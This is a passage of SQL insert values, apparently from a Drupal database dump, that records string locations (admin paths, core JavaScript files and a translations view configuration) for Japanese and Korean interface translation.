(1042, 815, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1043, 816, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1044, 817, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1045, 818, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1046, 819, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1047, 820, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1048, 821, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1049, 822, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1050, 823, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1051, 824, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1052, 825, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1053, 826, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1054, 827, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1055, 828, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1056, 829, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1057, 830, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1058, 831, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1059, 832, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1060, 833, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1061, 834, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1062, 835, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1063, 836, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1064, 837, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1065, 838, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1066, 839, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1067, 840, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1068, 841, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1069, 842, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1070, 843, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1071, 844, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1072, 845, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1073, 846, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1074, 847, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1075, 848, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1076, 849, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1077, 850, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1078, 851, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1079, 852, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1080, 853, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1081, 854, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1082, 855, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1083, 856, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1084, 857, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1085, 858, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1086, 859, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1087, 860, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1088, 861, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1089, 862, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1090, 863, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1091, 864, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1092, 865, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1093, 866, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1094, 867, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1095, 868, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1096, 869, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1097, 870, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1098, 871, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1099, 872, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1100, 873, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1101, 874, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1102, 875, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1103, 876, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1104, 877, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1105, 878, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1106, 879, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1107, 880, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1108, 881, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1109, 882, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1110, 883, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1111, 884, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1112, 885, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1113, 886, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1114, 887, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1115, 888, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1116, 889, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1117, 890, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1118, 891, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1119, 892, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1120, 893, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1121, 894, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1122, 895, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1123, 896, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1124, 897, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1125, 898, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1126, 899, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1127, 900, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1128, 901, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1129, 902, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1130, 903, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1131, 904, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1132, 905, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1133, 906, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1134, 907, 'path', '/ja/node/1/translations/add/en/ja', '9.5.9'),
(1135, 908, 'path', '/ja/content/about-us', '9.5.9'),
(1136, 909, 'path', '/ja/content/about-us', '9.5.9'),
(1137, 910, 'path', '/ja/content/about-us', '9.5.9'),
(1138, 911, 'path', '/ja/content/about-us', '9.5.9'),
(1139, 912, 'path', '/ja/content/about-us', '9.5.9'),
(1140, 913, 'path', '/ja/content/about-us', '9.5.9'),
(1141, 914, 'path', '/ja/content/about-us', '9.5.9'),
(1142, 915, 'path', '/ja/content/about-us', '9.5.9'),
(1143, 916, 'path', '/ja/contextual/render', '9.5.9'),
(1144, 917, 'path', '/ja/contextual/render', '9.5.9'),
(1145, 918, 'path', '/ja/contextual/render', '9.5.9'),
(1146, 919, 'path', '/ja/contextual/render', '9.5.9'),
(1147, 920, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1148, 921, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1149, 922, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1150, 923, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1151, 924, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1152, 925, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1153, 926, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1154, 927, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1155, 928, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1156, 929, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1157, 930, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1158, 931, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1159, 932, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1160, 933, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1161, 934, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1162, 935, 'path', '/ja/admin/content', '9.5.9'),
(1163, 936, 'path', '/ja/admin/content', '9.5.9'),
(1164, 937, 'path', '/ja/admin/content', '9.5.9'),
(1165, 938, 'path', '/ja/admin/content', '9.5.9'),
(1166, 939, 'path', '/ja/admin/content', '9.5.9'),
(1167, 940, 'path', '/ja/admin/content', '9.5.9'),
(1168, 941, 'path', '/ja/admin/content', '9.5.9'),
(1169, 942, 'path', '/ja/admin/content', '9.5.9'),
(1170, 943, 'path', '/ja/admin/content', '9.5.9'),
(1171, 944, 'path', '/ja/admin/content', '9.5.9'),
(1172, 945, 'path', '/ja/admin/content', '9.5.9'),
(1173, 946, 'path', '/ja/admin/modules', '9.5.9'),
(1174, 947, 'path', '/ja/admin/modules', '9.5.9'),
(1175, 948, 'path', '/ja/admin/modules', '9.5.9'),
(1176, 949, 'path', '/ja/admin/modules', '9.5.9'),
(1177, 950, 'path', '/ja/admin/modules', '9.5.9'),
(1178, 951, 'path', '/ja/admin/modules', '9.5.9'),
(1179, 952, 'path', '/ja/admin/modules', '9.5.9'),
(1180, 953, 'path', '/ja/admin/modules', '9.5.9'),
(1181, 954, 'path', '/ja/admin/modules', '9.5.9'),
(1182, 955, 'path', '/ja/admin/modules', '9.5.9'),
(1183, 956, 'path', '/ja/admin/modules', '9.5.9'),
(1184, 957, 'path', '/ja/admin/modules', '9.5.9'),
(1185, 958, 'path', '/ja/admin/modules', '9.5.9'),
(1186, 959, 'path', '/ja/admin/modules', '9.5.9'),
(1187, 960, 'path', '/ja/admin/modules', '9.5.9'),
(1188, 961, 'path', '/ja/admin/modules', '9.5.9'),
(1189, 962, 'path', '/ja/admin/modules', '9.5.9'),
(1190, 963, 'path', '/ja/admin/modules', '9.5.9'),
(1191, 964, 'path', '/ja/admin/modules', '9.5.9'),
(1192, 965, 'path', '/ja/admin/modules', '9.5.9'),
(1193, 966, 'path', '/ja/admin/modules', '9.5.9'),
(1194, 967, 'path', '/ja/admin/modules', '9.5.9'),
(1195, 968, 'path', '/ja/admin/modules', '9.5.9'),
(1196, 969, 'path', '/ja/admin/modules', '9.5.9'),
(1197, 970, 'path', '/ja/admin/modules', '9.5.9'),
(1198, 971, 'path', '/ja/admin/modules', '9.5.9'),
(1199, 972, 'path', '/ja/admin/modules', '9.5.9'),
(1200, 973, 'path', '/ja/admin/modules', '9.5.9'),
(1201, 974, 'path', '/ja/admin/modules', '9.5.9'),
(1202, 975, 'path', '/ja/admin/modules', '9.5.9'),
(1203, 976, 'path', '/ja/admin/modules', '9.5.9'),
(1204, 977, 'path', '/ja/admin/modules', '9.5.9'),
(1205, 978, 'path', '/ja/admin/modules', '9.5.9'),
(1206, 979, 'path', '/ja/admin/modules', '9.5.9'),
(1207, 980, 'path', '/ja/admin/modules', '9.5.9'),
(1208, 981, 'path', '/ja/admin/modules', '9.5.9'),
(1209, 982, 'path', '/ja/admin/modules', '9.5.9'),
(1210, 983, 'path', '/ja/admin/modules', '9.5.9'),
(1211, 984, 'path', '/ja/admin/modules', '9.5.9'),
(1212, 985, 'path', '/ja/admin/modules', '9.5.9'),
(1213, 986, 'path', '/ja/admin/modules', '9.5.9'),
(1214, 987, 'path', '/ja/admin/modules', '9.5.9'),
(1215, 988, 'path', '/ja/admin/modules', '9.5.9'),
(1216, 989, 'path', '/ja/admin/modules', '9.5.9'),
(1217, 990, 'path', '/ja/admin/modules', '9.5.9'),
(1218, 991, 'path', '/ja/admin/modules', '9.5.9'),
(1219, 992, 'path', '/ja/admin/modules', '9.5.9'),
(1220, 993, 'path', '/ja/admin/modules', '9.5.9'),
(1221, 994, 'path', '/ja/admin/modules', '9.5.9'),
(1222, 995, 'path', '/ja/admin/modules', '9.5.9'),
(1223, 996, 'path', '/ja/admin/modules', '9.5.9'),
(1224, 997, 'path', '/ja/admin/modules', '9.5.9'),
(1225, 998, 'path', '/ja/admin/modules', '9.5.9'),
(1226, 999, 'path', '/ja/admin/modules', '9.5.9'),
(1227, 1000, 'path', '/ja/admin/modules', '9.5.9'),
(1228, 1001, 'path', '/ja/admin/modules', '9.5.9'),
(1229, 1002, 'path', '/ja/admin/modules', '9.5.9'),
(1230, 1003, 'path', '/ja/admin/modules', '9.5.9'),
(1231, 1004, 'path', '/ja/admin/modules', '9.5.9'),
(1232, 1005, 'path', '/ja/admin/modules', '9.5.9'),
(1233, 1006, 'path', '/ja/admin/modules', '9.5.9'),
(1234, 1007, 'path', '/ja/admin/modules', '9.5.9'),
(1235, 1008, 'path', '/ja/admin/modules', '9.5.9'),
(1236, 1009, 'path', '/ja/admin/modules', '9.5.9'),
(1237, 1010, 'path', '/ja/admin/modules', '9.5.9'),
(1238, 1011, 'path', '/ja/admin/modules', '9.5.9'),
(1239, 1012, 'path', '/ja/admin/modules', '9.5.9'),
(1240, 1013, 'path', '/ja/admin/modules', '9.5.9'),
(1241, 1014, 'path', '/ja/admin/modules', '9.5.9'),
(1242, 1015, 'path', '/ja/admin/modules', '9.5.9'),
(1243, 1016, 'path', '/ja/admin/modules', '9.5.9'),
(1244, 1017, 'path', '/ja/admin/modules', '9.5.9'),
(1245, 1018, 'path', '/ja/admin/modules', '9.5.9'),
(1246, 1019, 'path', '/ja/admin/modules', '9.5.9'),
(1247, 1020, 'path', '/ja/admin/modules', '9.5.9'),
(1248, 1021, 'path', '/ja/admin/modules', '9.5.9'),
(1249, 1022, 'path', '/ja/admin/modules', '9.5.9'),
(1250, 1023, 'path', '/ja/admin/modules', '9.5.9'),
(1251, 1024, 'path', '/ja/admin/modules', '9.5.9'),
(1252, 1025, 'path', '/ja/admin/modules', '9.5.9'),
(1253, 1026, 'path', '/ja/admin/modules', '9.5.9'),
(1254, 1027, 'path', '/ja/admin/modules', '9.5.9'),
(1255, 1028, 'path', '/ja/admin/modules', '9.5.9'),
(1256, 1029, 'path', '/ja/admin/modules', '9.5.9'),
(1257, 1030, 'path', '/ja/admin/modules', '9.5.9'),
(1258, 1031, 'path', '/ja/admin/modules', '9.5.9'),
(1259, 1032, 'path', '/ja/admin/modules', '9.5.9'),
(1260, 1033, 'path', '/ja/admin/modules', '9.5.9'),
(1261, 1034, 'path', '/ja/admin/modules', '9.5.9'),
(1262, 1035, 'path', '/ja/admin/modules', '9.5.9'),
(1263, 1036, 'path', '/ja/admin/modules', '9.5.9'),
(1264, 1037, 'path', '/ja/admin/modules', '9.5.9'),
(1265, 1038, 'path', '/ja/admin/modules', '9.5.9'),
(1266, 1039, 'path', '/ja/admin/modules', '9.5.9'),
(1267, 1040, 'path', '/ja/admin/modules', '9.5.9'),
(1268, 1041, 'path', '/ja/admin/modules', '9.5.9'),
(1269, 1042, 'path', '/ja/admin/modules', '9.5.9'),
(1270, 1043, 'path', '/ja/admin/modules', '9.5.9'),
(1271, 1044, 'path', '/ja/admin/modules', '9.5.9'),
(1272, 1045, 'path', '/ja/admin/modules', '9.5.9'),
(1273, 1046, 'path', '/ja/admin/modules', '9.5.9'),
(1274, 1047, 'path', '/ja/admin/modules', '9.5.9'),
(1275, 1048, 'path', '/ja/admin/modules', '9.5.9'),
(1276, 1049, 'path', '/ja/admin/modules', '9.5.9'),
(1277, 1050, 'path', '/ja/admin/modules', '9.5.9'),
(1278, 1051, 'path', '/ja/admin/modules', '9.5.9'),
(1279, 1052, 'path', '/ja/admin/modules', '9.5.9'),
(1280, 1053, 'path', '/ja/admin/modules', '9.5.9'),
(1281, 1054, 'path', '/ja/admin/modules', '9.5.9'),
(1282, 1055, 'path', '/ja/admin/modules', '9.5.9'),
(1283, 1056, 'path', '/ja/admin/modules', '9.5.9'),
(1284, 1057, 'path', '/ja/admin/modules', '9.5.9'),
(1285, 1058, 'path', '/ja/admin/modules', '9.5.9'),
(1286, 1059, 'path', '/ja/admin/modules', '9.5.9'),
(1287, 1060, 'path', '/ja/admin/modules', '9.5.9'),
(1288, 1061, 'path', '/ja/admin/modules', '9.5.9'),
(1289, 1062, 'path', '/ja/admin/modules', '9.5.9'),
(1290, 1063, 'path', '/ja/admin/modules', '9.5.9'),
(1291, 1064, 'path', '/ja/admin/modules', '9.5.9'),
(1292, 1065, 'path', '/ja/admin/modules', '9.5.9'),
(1293, 1066, 'path', '/ja/admin/modules', '9.5.9'),
(1294, 1067, 'path', '/ja/admin/modules', '9.5.9'),
(1295, 1068, 'path', '/ja/admin/modules', '9.5.9'),
(1296, 1069, 'path', '/ja/admin/modules', '9.5.9'),
(1297, 1070, 'path', '/ja/admin/modules', '9.5.9'),
(1298, 1071, 'path', '/ja/admin/modules', '9.5.9'),
(1299, 1072, 'path', '/ja/admin/modules', '9.5.9'),
(1300, 1073, 'path', '/ja/admin/modules', '9.5.9'),
(1301, 1074, 'path', '/ja/admin/modules', '9.5.9'),
(1302, 1075, 'path', '/ja/admin/modules', '9.5.9'),
(1303, 1076, 'path', '/ja/admin/modules', '9.5.9'),
(1304, 1077, 'path', '/ja/admin/modules', '9.5.9'),
(1305, 1078, 'path', '/ja/admin/modules', '9.5.9'),
(1306, 1079, 'path', '/ja/admin/modules', '9.5.9'),
(1307, 1080, 'path', '/ja/admin/modules', '9.5.9'),
(1308, 1081, 'path', '/ja/admin/modules', '9.5.9'),
(1309, 1082, 'path', '/ja/admin/modules', '9.5.9'),
(1310, 1083, 'javascript', 'core/modules/system/js/system.modules.js', '9.5.11'),
(1311, 1084, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1312, 1085, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1313, 1086, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1314, 1087, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1315, 1088, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1316, 1089, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1317, 1090, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1318, 1091, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1319, 1092, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1320, 1093, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1321, 1094, 'path', '/ja/admin/config/regional/language', '9.5.9'),
(1322, 1095, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1323, 1096, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1324, 1097, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1325, 1098, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1326, 1099, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1327, 1100, 'path', '/ja/admin/config/regional/language/edit/en?destination=/ja/admin/config/regional/language', '9.5.9'),
(1328, 1101, 'path', '/ja/admin/structure/menu/item/1/edit/translations/add/en/ja', '9.5.9'),
(1329, 1102, 'path', '/ja/admin/structure/menu/item/1/edit', '9.5.9'),
(1330, 1103, 'path', '/ja/admin/structure/menu/item/1/edit', '9.5.9'),
(1331, 1104, 'path', '/ja/node/1/translations', '9.5.9'),
(1332, 1105, 'path', '/ja/node/1/translations', '9.5.9'),
(1333, 1106, 'path', '/ja/node/1/translations', '9.5.9'),
(1334, 1107, 'path', '/ja/node/1/translations', '9.5.9'),
(1335, 1108, 'path', '/ko/node/1/translations/add/en/ko', '9.5.9'),
(1336, 1109, 'path', '/ko/node/1/translations/add/en/ko', '9.5.9'),
(1337, 1110, 'path', '/ko/node/1/translations/add/en/ko', '9.5.9'),
(1338, 1111, 'path', '/ko/admin/structure/menu', '9.5.9'),
(1339, 1112, 'path', '/ko/admin/structure/menu', '9.5.9'),
(1340, 1113, 'path', '/ko/admin/structure/menu', '9.5.9'),
(1341, 739, 'javascript', 'core/modules/views_ui/js/views-admin.js', '10.6.15'),
(1342, 1114, 'javascript', 'core/modules/views_ui/js/views-admin.js', '10.6.15'),
(1343, 1115, 'javascript', 'core/modules/views_ui/js/views-admin.js', '10.6.15'),
(1344, 1116, 'javascript', 'core/modules/views_ui/js/views-admin.js', '10.6.15'),
(1345, 1117, 'javascript', 'core/modules/views_ui/js/views-admin.js', '10.6.15'),
(1346, 1118, 'path', '/ja/admin/modules', '9.5.9'),
(1347, 1119, 'path', '/ja/admin/modules', '9.5.9'),
(1348, 1120, 'path', '/ja/admin/modules', '9.5.9'),
(1349, 1121, 'path', '/ja/batch?id=7&op=start', '9.5.9'),
(1350, 1122, 'path', '/ja/batch?id=7&op=start', '9.5.9'),
(1351, 1123, 'path', '/ja/batch?id=7&op=start', '9.5.9'),
(1352, 1129, 'path', '/ja/batch?id=7&op=do_nojs&op=do&_format=json', '9.5.9'),
(1353, 1130, 'path', '/ja/batch?id=7&op=do_nojs&op=do&_format=json', '9.5.9'),
(1354, 1131, 'configuration', 'views.view.content_translations', '9.5.9'),
(1355, 1132, 'configuration', 'views.view.content_translations', '9.5.9'),
(1356, 189, 'configuration', 'views.view.content_translations', '9.5.9'),
(1357, 66, 'configuration', 'views.view.content_translations', '9.5.9'),
(1358, 67, 'configuration', 'views.view.content_translations', '9.5.9'),
(1359, 68, 'configuration', 'views.view.content_translations', '9.5.9'),
(1360, 69, 'configuration', 'views.view.content_translations', '9.5.9'),
(1361, 61, 'configuration', 'views.view.content_translations', '9.5.9'),
(1362, 60, 'configuration', 'views.view.content_translations', '9.5.9'),
(1363, 296, 'configuration', 'views.view.content_translations', '9.5.9'),
(1364, 297, 'configuration', 'views.view.content_translations', '9.5.9'),
(1365, 62, 'configuration', 'views.view.content_translations', '9.5.9'),
(1366, 63, 'configuration', 'views.view.content_translations', '9.5.9'),
(1367, 64, 'configuration', 'views.view.content_translations', '9.5.9'),
(1368, 306, 'configuration', 'views.view.content_translations', '9.5.9'),
(1369, 81, 'configuration', 'views.view.content_translations', '9.5.9'),
(1370, 1133, 'configuration', 'views.view.content_translations', '9.5.9'),
(1371, 1134, 'configuration', 'views.view.content_translations', '9.5.9'),
(1372, 793, 'configuration', 'views.view.content_translations', '9.5.9'),
(1373, 1135, 'configuration', 'views.view.content_translations', '9.5.9'),
(1374, 430, 'configuration', 'views.view.content_translations', '9.5.9'),
(1375, 1136, 'configuration', 'views.view.content_translations', '9.5.9'),
(1376, 1137, 'configuration', 'views.view.content_translations', '9.5.9'),
(1377, 774, 'configuration', 'views.view.content_translations', '9.5.9'),
(1378, 1138, 'configuration', 'views.view.content_translations', '9.5.9'),
(1379, 1139, 'configuration', 'views.view.content_translations', '9.5.9'),
(1380, 1140, 'configuration', 'views.view.content_translations', '9.5.9'),
(1381, 80, 'configuration', 'views.view.content_translations', '9.5.9'),
(1382, 1141, 'path', '/ja/batch?id=7&op=do_nojs&op=finished', '9.5.9'),
(1383, 1142, 'path', '/ja/batch?id=7&op=do_nojs&op=finished', '9.5.9'),
(1384, 1143, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1385, 1144, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1386, 1145, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1387, 1146, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1388, 1147, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1389, 1148, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1390, 1149, 'path', '/ko/admin/structure/menu/manage/main-menu', '9.5.9'),
(1391, 1150, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1392, 1151, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1393, 1152, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1394, 1153, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1395, 1154, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1396, 1155, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1397, 1156, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1398, 1157, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1399, 1158, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1400, 1159, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1401, 1160, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1402, 1161, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1403, 1162, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1404, 1163, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1405, 1164, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1406, 1165, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1407, 1166, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1408, 1167, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1409, 1168, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1410, 1169, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1411, 1170, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1412, 1171, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1413, 1172, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1414, 1173, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1415, 1174, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1416, 1175, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1417, 1176, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1418, 1177, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1419, 1178, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1420, 1179, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1421, 1180, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1422, 1181, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1423, 1182, 'javascript', 'core/modules/node/content_types.js', '10.6.15'),
(1424, 1183, 'javascript', 'core/modules/node/content_types.js', '10.6.15'),
(1425, 1184, 'javascript', 'core/modules/node/content_types.js', '10.6.15'),
(1426, 915, 'javascript', 'core/misc/vertical-tabs.js', '10.6.15'),
(1427, 1185, 'path', '/ko/admin/structure/types/add', '9.5.9'),
(1428, 1186, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1429, 1187, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1430, 1188, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1431, 1189, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1432, 1190, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1433, 1191, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1434, 1192, 'path', '/ko/admin/structure/types/manage/slider/fields', '9.5.9'),
(1435, 1193, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1436, 1194, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1437, 1195, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1438, 1196, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1439, 1197, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1440, 1198, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1441, 1199, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1442, 1200, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1443, 1201, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1444, 1202, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1445, 1203, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1446, 1204, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1447, 1205, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1448, 1206, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1449, 1207, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1450, 1208, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
(1451, 1209, 'path', '/ko/admin/structure/types/manage/slider/fields/add-field', '9.5.9'),
